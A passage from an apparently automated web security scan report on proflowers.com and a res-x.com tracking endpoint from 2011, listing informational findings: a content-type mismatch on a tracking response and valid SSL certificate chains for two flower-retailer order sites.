24.3. http://www.res-x.com/ws/r2/Resonance.aspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.res-x.com
Path:   /ws/r2/Resonance.aspx

Issue detail

The response contains the following Content-type statement: text/plain; charset=utf-8. The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /ws/r2/Resonance.aspx?appid=provide01&tk=674723556265235&ss=612828374374657&sg=1&pg=852078527677804&bx=false&vr=2.69&ei=&qt=&pr=&tt=&cu=91621bab-4967-45f8-ad8e-98be730e6e4a&tr=&cv2=PFC&cv3=HPC&cv4=27&cv5=&cv6=&cv7=&cv8=&cv9=&cv10=&cv11=&cv12=&cv13=&cv14=&cv15=&cv16=true&cv17=&cv18=&cv19=&cv20=&cv22=&cv23=&cv25=&cv26=&cv27=&cv28=&cv29=&cv30=&cv31=&cv32=&cv33=&cv34=&cv35=&cv36=PFC%3ALanding%3AHome&cv37=&cv38=91621bab-4967-45f8-ad8e-98be730e6e4a&cv39=&cv40=true&cv41=false&ur=http%3A//www.proflowers.com/&plk=&rf= HTTP/1.1
Host: www.res-x.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=epyn03551ctyeoyvyfqn3nya; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NOI DSP COR CUR PSA PSD OUR IND UNI"
Date: Mon, 09 May 2011 12:08:23 GMT
Set-Cookie: NSC_wjq-qspwjef=ffffffffc3a01e4445525d5f4f58455e445a4a423660;path=/;httponly
Content-Length: 10

<!-- //-->

25. SSL certificate
There are 2 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

25.1. https://orders.proflowers.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://orders.proflowers.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  orders.proflowers.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Mon Dec 06 18:00:00 CST 2010
Valid to:  Thu Dec 08 17:59:59 CST 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Wed Jul 16 18:59:59 CDT 2036

Certificate chain #3

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Wed Jul 16 18:59:59 CDT 2036

25.2. https://ww30.1800flowers.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ww30.1800flowers.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  ww30.1800flowers.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Thu Dec 02 18:00:00 CST 2010
Valid to:  Sun Dec 02 17:59:59 CST 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028